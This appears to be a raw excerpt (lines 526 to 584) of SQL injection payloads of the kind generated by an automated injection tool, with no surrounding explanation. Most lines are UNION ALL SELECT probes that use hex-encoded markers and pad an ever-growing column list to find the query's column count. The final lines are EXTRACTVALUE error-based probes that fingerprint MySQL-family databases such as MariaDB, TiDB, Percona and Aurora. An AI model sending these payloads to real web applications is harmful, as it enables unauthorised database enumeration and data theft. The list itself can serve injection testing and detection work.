|526|-3348' UNION ALL SELECT CONCAT(0x7171717671,0x655665586571545642684a46786261644b56584d6f476e435556696a434c4c6a4754464a6c714176,0x716b786271),NULL-- -
|527|-2878' UNION ALL SELECT NULL,CONCAT(0x7171717671,0x574a43796b4d7a78586b,0x716b786271)-- -
|528|-9635' UNION ALL SELECT CONCAT(0x7171717671,0x556672426c7a45724c70,0x716b786271),NULL-- -
|529|'' UNION ALL SELECT CONCAT(0x7171717671,0x47764b6665556343414675714e5548586d774c504b73684d774a764867566c63536a7479704b744b,0x716b786271),67-- -
|530|'' UNION ALL SELECT 67,CONCAT(0x7171717671,0x76744b70436a6d6875665779486e634377776c6e6345546745564349744a65797a48636c66754568,0x716b786271)-- -
|531|'' UNION ALL SELECT CONCAT(0x7171717671,0x57724467706b5678464b,0x716b786271),67-- -
|532|'' UNION ALL SELECT 67,CONCAT(0x7171717671,0x4373784f4473704e4777,0x716b786271)-- -
|533|-9336' UNION ALL SELECT 67,CONCAT(0x7171717671,0x7863714246686e41477a666654566c6d657479576c636275706a58424c715765484b42476164765a,0x716b786271)-- -
|534|-8730' UNION ALL SELECT CONCAT(0x7171717671,0x41657a79764166777649476f66656f674a7a7153624a486943446959534579694a506a7562537370,0x716b786271),67-- -
|535|-5758' UNION ALL SELECT 67,CONCAT(0x7171717671,0x5157424766714a46656d,0x716b786271)-- -
|536|-4612' UNION ALL SELECT CONCAT(0x7171717671,0x44704b534b6b6d664a48,0x716b786271),67-- -
|537|-6047' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|538|-2799' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|539|-9737' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|540|-7273' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|541|-1600' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|542|-2051' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|543|-5510' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|544|-4837' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|545|-6273' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|546|-8415' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|547|-4739' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|548|-1872' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|549|-6811' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|550|-6483' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|551|-1028' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|552|-2722' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|553|-2677' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|554|-3587' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|555|-4985' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|556|-1978' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|557|-4448' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|558|-5328' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|559|-6349' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|560|-1209' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|561|-3781' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|562|-9033' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|563|-9050' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|564|-2665' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|565|-9352' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|566|-3430' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|567|-2438' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|568|-6684' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|569|-7425' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|570|-2094' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|571|-2949' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|572|-8497' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|573|-1066' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|574|-9552' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|575|-8480' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|576|-1915' UNION ALL SELECT 67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67-- -
|577|'' AND EXTRACTVALUE(2264,CONCAT(0x5c,0x7171717671,(SELECT (CASE WHEN (3747=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3747) THEN 1 ELSE 0 END)),0x716b786271))-- LjbQ
|578|'' AND EXTRACTVALUE(1400,CONCAT(0x5c,0x7171717671,(SELECT REPEAT(0x34,1024)),0x716b786271))-- AOfV
|579|'' AND EXTRACTVALUE(9322,CONCAT(0x5c,0x7171717671,(SELECT REPEAT(0x31,21)),0x716b786271))-- tQTN
|580|'' AND EXTRACTVALUE(8729,CONCAT(0x5c,0x7171717671,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x716b786271))-- AYyK
|581|'' AND EXTRACTVALUE(1106,CONCAT(0x5c,0x7171717671,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x716b786271))-- wbDD
|582|'' AND EXTRACTVALUE(8192,CONCAT(0x5c,0x7171717671,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x716b786271))-- utri
|583|'' AND EXTRACTVALUE(3021,CONCAT(0x5c,0x7171717671,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x716b786271))-- gHZx
|584|'' AND EXTRACTVALUE(1454,CONCAT(0x5c,0x7171717671,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x716b786271))-- QOMK
